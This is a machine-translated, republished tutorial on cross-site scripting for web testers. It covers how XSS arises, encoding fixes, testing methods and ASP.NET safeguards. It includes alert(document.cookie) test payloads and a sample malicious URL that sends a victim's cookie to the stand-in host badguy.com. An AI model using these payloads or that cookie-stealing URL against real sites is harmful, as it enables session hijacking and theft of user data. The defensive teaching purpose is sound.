XSS for web security testing

Source: Internet
Author: User
Tags html encode alphanumeric characters

Turn http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html

The XSS full name (cross site Scripting) multi-site Scripting attack is the most common vulnerability in Web applications.  An attacker embeds a client script (such as JavaScript) in a Web page, and when the user browses to the page, the script executes on the user's browser to achieve the attacker's purpose. For example, get the user's cookie, navigate to a malicious website, carry a Trojan horse, etc.

As testers, you need to understand the principles of XSS, attack scenarios, and how to fix them. Can effectively prevent the occurrence of XSS.

Read Catalogue

    1. How XSS happens
    2. HTML Encode
    3. XSS attack Scenario
    4. Fix for XSS vulnerability
    5. How to test XSS vulnerabilities
    6. The difference between HTML Encode and URL Encode
    7. XSS filters in the browser
    8. Asp. The XSS security mechanism in net
How does XSS happen?

If there is a textbox below

<input type= "text" name= "Address1" value= "Value1from" >

Value1from is the input from the user, if the user is not the input value1from, but instead enters "/><script>alert (document.cookie) </script><!- Then it will become

<input type= "text" name= "Address1" value= "/><script>alert (document.cookie) </script><!-" >

Embedded JavaScript code will be executed

Or the user enters "onfocus=" alert (document.cookie), then it becomes

<input type= "text" name= "Address1" value= "onfocus=" alert (document.cookie) ">

The embedded JavaScript code will be executed when the event is triggered.

The power of the attack depends on what kind of script the user has entered

Of course, user-submitted data can also be sent to the server via QueryString (placed in a URL) and cookies. For example

HTML Encode

The reason that XSS occurs is because the data entered by the user becomes code. So we need to do HTML encode processing of the data entered by the user. Encode special characters such as "bracket", "single quote", "quotation mark".

A ready-made approach has been provided in C #, as long as you call Httputility.htmlencode ("string <scritp>"). (Need to reference system.web assembly)

Fiddler also provides a handy tool to click on the "Textwizard" button on the toolbar

XSS attack Scenario

1. The dom-based XSS vulnerability attack process is as follows

Tom found a page in victim.com with an XSS vulnerability,

Example: Http://victim.com/search.asp?term=apple

The code for the Search.asp page in the server is probably the following

<title></title>
<body>
Results for <%reequest.querystring ("term")%>
...
</body>

Tom first set up a website http://badguy.com to receive "steal" information.
Then Tom constructs a malicious URL (below), sent to Monica in some way (mail, QQ)

Http://victim.com/search.asp?term=<script>window.open ("http://badguy.com?cookie=" +document.cookie) </ Script>

Monica clicked on this URL, the malicious JavaScript code embedded in the URL will be executed in Monica's browser. Then Monica cookies on the victim.com website will be sent to the Badguy website. So the information Monica in Victim.com was stolen by Tom.

2. Stored xss (stored XSS Vulnerability), a vulnerability that is widely applied and potentially impacting the security of a large Web server, an attacker uploads an attack script to a Web server so that all users accessing the page are exposed to the possibility of information disclosure. The attack process is as follows

Alex found out there was an XSS vulnerability on site A that allowed the attack code to be saved in the database.

Alex has published an article that embeds malicious JavaScript code in the article.

When other people like Monica visit this article, the malicious JavaScript code embedded in the article will be executed in Monica's browser, and the session cookie or other information will be stolen by Alex.

The dom-based XSS vulnerability threatens the individual user, and the object that the stored XSS vulnerability threatens is a large number of users.

XSS Bug fix

Principle: Do not trust the data entered by the customer
Note: The attack code is not necessarily in <script></script>

    1. Mark the important cookie as HTTP only so that the Document.cookie statement in JavaScript cannot get the cookie.
    2. Only allow users to enter the data we expect. For example: In a TextBox of age, only users are allowed to enter numbers. and the characters outside the numbers are filtered out.
    3. HTML Encode Processing of data
    4. Filter or remove special HTML tags such as: <script>, <iframe>, &lt; for <, &gt; For &quot;
    5. Filters the tags of javascript events. such as "onclick=", "onfocus" and so on.
How to test XSS vulnerabilities

Method One: Look at the code, look for the key variables, the client transmits the data to the Web server generally in three ways Querystring, form forms, and cookies. For example, in an ASP program, the client's variables are obtained through the request object

<%
Strusercode = request.querystring ("code");
struser = Request.Form ("USER");
Strid = request.cookies ("ID");
%>

If the variable is not htmlencode processed, then there is an XSS vulnerability in this variable

Method Two: Prepare the test script,

"/><script>alert (document.cookie) </script><!--
<script>alert (document.cookie) </script><!--
"onclick=" alert (document.cookie)

In the Web page of the textbox or other places to enter data, enter these test scripts, see if you can pop up a dialog box, can pop up to indicate the existence of XSS vulnerability

See those variables in the URL to pass the value to the Web server through the URL, and return the values of these variables to our test script. and see if our script can execute.

Method Three: Automated test XSS vulnerability
Now there are a lot of XSS scanning tools. Implementing XSS Automation Testing is simple and requires only the HttpWebRequest class. Include the XSS test script. Sent to the Web server. Then look at the HttpWebResponse, whether our XSS test script has been injected in.

The difference between HTML Encode and URL Encode

At first I always confuse these two things, which is actually two different things.

HTML encoding has been described earlier, about URL encoding to conform to the specifications of the URL. Because Chinese and many characters in the standard URL specification are not allowed to appear in the URL.

For example, search for "test Chinese characters" in Baidu. The URL will become
http://www.baidu.com/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477

The so-called URL code is: all non-alphanumeric characters will be replaced with a percent sign (%) followed by a two-digit hexadecimal number, the space is encoded as a plus (+)

A ready-made approach has been provided in C #, as long as you call Httputility.urlencode ("string <scritp>"). (Need to reference system.web assembly)

Fiddler also provides a handy tool to click on the "Textwizard" button on the toolbar

XSS filters in the browser

To prevent XSS, many browser vendors add security to the browser to filter for XSS. For example, Ie8,ie9,firefox, Chrome. All have security mechanisms for XSS. The browser will block XSS. For example

If you need to do a test, it is best to use IE7.

Asp. The XSS security mechanism in net

Asp. NET has a mechanism to prevent XSS, the submitted form will automatically check for XSS, when the user tries to enter the XSS code, ASP. NET throws an error such as

Many programmers do not have the concept of security, or even know that there is an XSS. Asp. NET at this point to do the default security. In this way, even a security-conscious programmer can write a "safer site."

If you want to disable this security feature, you can use <%@ page validaterequest= "false"%>

XSS for web security testing

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.